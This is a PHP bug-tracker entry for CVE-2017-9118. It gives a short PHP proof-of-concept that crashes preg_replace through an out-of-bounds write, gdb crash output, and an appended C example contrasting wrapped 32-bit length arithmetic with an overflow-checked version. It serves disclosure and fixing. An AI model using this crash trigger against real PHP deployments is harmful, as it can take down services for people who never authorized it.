[2017-05-23 01:26 UTC] whitehat002 at hotmail dot com
[2017-06-20 06:18 UTC] stas@php.net
-Type: Security
+Type: Bug
[2018-08-03 03:35 UTC] kaplan@php.net
-CVE-ID:
+CVE-ID: 2017-9118
[2018-12-08 11:20 UTC] cmb@php.net
[2021-10-20 12:05 UTC] cmb@php.net
[2021-10-20 12:07 UTC] cmb@php.net
-Status: Open
+Status: Verified
-Assigned To:
+Assigned To: cmb
[2021-11-29 18:19 UTC] git@php.net
[2021-11-29 18:19 UTC] git@php.net
-Status: Verified
+Status: Closed
Copyright © 2001-2025 The PHP Group. All rights reserved.
Last updated: Thu Oct 30 18:00:02 2025 UTC
Description:
------------
It seems to be an out of bounds bug.

Test script:
---------------
<?php
ini_set('memory_limit', -1);
$str = str_repeat("A", 0x7ffffffe);
preg_replace("/A/i", $str, "AAAAAAAAAAAAAAAAAA");

Expected result:
----------------
no crash

Actual result:
--------------
root@hackyzh-virtual-machine:~# gdb -q --args ./php-7.1.5/sapi/cli/php -n poc2.php
Reading symbols from /root/php-7.1.5/sapi/cli/php...done.
gdb-peda$ r
[Thread debugging using libthread_db enabled]
Using host libthread_db library "/lib/i386-linux-gnu/libthread_db.so.1".

Program received signal SIGSEGV, Segmentation fault.
[----------------------------------registers-----------------------------------]
EAX: 0x36dfdfb0 ('A' <repeats 200 times>...)
EBX: 0xb7200000
ECX: 0x0
EDX: 0x41 ('A')
ESI: 0x41 ('A')
EDI: 0xb6c0000d --> 0x0
EBP: 0xbfffbf98 --> 0xb7013100 ('A' <repeats 200 times>...)
ESP: 0xbfffbe90 --> 0xb7002060 ('A' <repeats 200 times>...)
EIP: 0x8106c7d (<php_pcre_replace_impl+941>: mov BYTE PTR [ebx],dl)
EFLAGS: 0x210293 (CARRY parity ADJUST zero SIGN trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
   0x8106c75 <php_pcre_replace_impl+933>: jne    0x8106cb8 <php_pcre_replace_impl+1000>
   0x8106c77 <php_pcre_replace_impl+935>: mov    eax,DWORD PTR [ebp-0x24]
   0x8106c7a <php_pcre_replace_impl+938>: movzx  edx,BYTE PTR [eax]
=> 0x8106c7d <php_pcre_replace_impl+941>: mov    BYTE PTR [ebx],dl
   0x8106c7f <php_pcre_replace_impl+943>: lea    edx,[eax+0x1]
   0x8106c82 <php_pcre_replace_impl+946>: add    ebx,0x1
   0x8106c85 <php_pcre_replace_impl+949>: mov    DWORD PTR [ebp-0x24],edx
   0x8106c88 <php_pcre_replace_impl+952>: movzx  esi,BYTE PTR [eax]
[------------------------------------stack-------------------------------------]
0000| 0xbfffbe90 --> 0xb7002060 ('A' <repeats 200 times>...)
0004| 0xbfffbe94 --> 0xb7068048 ('A' <repeats 200 times>...)
0008| 0xbfffbe98 --> 0x0
0012| 0xbfffbe9c --> 0x20 (' ')
0016| 0xbfffbea0 --> 0x0
0020| 0xbfffbea4 --> 0x0
0024| 0xbfffbea8 --> 0xbfffbeb0 --> 0x0
0028| 0xbfffbeac --> 0x3
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
Stopped reason: SIGSEGV
php_pcre_replace_impl (pce=0x8bb1b30, subject_str=0xb7068038, subject=0xb7068048 'A' <repeats 200 times>..., subject_len=0x20, replace_val=0xb7013110, is_callable_replace=0x0, limit=0xffffffff, replace_count=0xbfffc08c) at /root/php-7.1.5/ext/pcre/php_pcre.c:1317
1317        *walkbuf++ = *walk++;
gdb-peda$ x/s $ebx
0xb7200000: <Address 0xb7200000 out of bounds>
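The crash above is a byte-by-byte copy (`*walkbuf++ = *walk++`) running past the end of the result buffer on an i386 build, where lengths are 32-bit. The following C program is an added illustration of that defect class, not PHP's own code: it models the result-length arithmetic for the report's inputs (a 0x20-byte subject of 'A', every byte matched and replaced by 0x7ffffffe bytes) with uint32_t standing in for the 32-bit size_t, shows the wrapped value beside the real one, and contrasts it with a checked computation that refuses instead of under-sizing the buffer.

```c
#include <stdbool.h>
#include <stdint.h>
#include <stdio.h>

/* Added illustration, not PHP's code.  The report is on i386, so lengths
 * are 32-bit: uint32_t models that build's size_t.  Inputs in main() are
 * the report's: 0x20-byte subject, 0x20 matches, 0x7ffffffe-byte replacement. */

/* Unchecked: bytes the copy loop will write, in wrapping 32-bit arithmetic.
 * After a wrap the value is smaller than the real one, so a buffer sized
 * from it is too small and the copy loop writes out of bounds. */
uint32_t naive_result_len(uint32_t subject_len, uint32_t matches,
                          uint32_t match_len, uint32_t replace_len)
{
    return subject_len - matches * match_len + matches * replace_len;
}

/* Same quantity in 64-bit arithmetic, for comparison with the wrapped value. */
uint64_t wide_result_len(uint32_t subject_len, uint32_t matches,
                         uint32_t match_len, uint32_t replace_len)
{
    return (uint64_t)subject_len - (uint64_t)matches * match_len
         + (uint64_t)matches * replace_len;
}

/* Checked: every multiply and add is tested for wrap-around; on overflow it
 * returns false so the caller refuses the operation instead of under-allocating. */
bool checked_result_len(uint32_t subject_len, uint32_t matches,
                        uint32_t match_len, uint32_t replace_len,
                        uint32_t *out)
{
    uint32_t removed, added, total;
    if (__builtin_mul_overflow(matches, match_len, &removed)) return false;
    if (removed > subject_len) return false;          /* inconsistent input */
    if (__builtin_mul_overflow(matches, replace_len, &added)) return false;
    if (__builtin_add_overflow(subject_len - removed, added, &total)) return false;
    *out = total;
    return true;
}

int main(void)
{
    uint32_t len;
    printf("32-bit length: %u, real length: %llu bytes\n",
           naive_result_len(0x20, 0x20, 1, 0x7ffffffe),
           (unsigned long long)wide_result_len(0x20, 0x20, 1, 0x7ffffffe));
    if (!checked_result_len(0x20, 0x20, 1, 0x7ffffffe, &len))
        printf("checked: result does not fit a 32-bit length, refused\n");
    return 0;
}
```

With the report's inputs the wrapped length is 4294967232 while the copy loop would write 68719476672 bytes; the checked version returns false and still accepts ordinary inputs such as a 3-byte replacement.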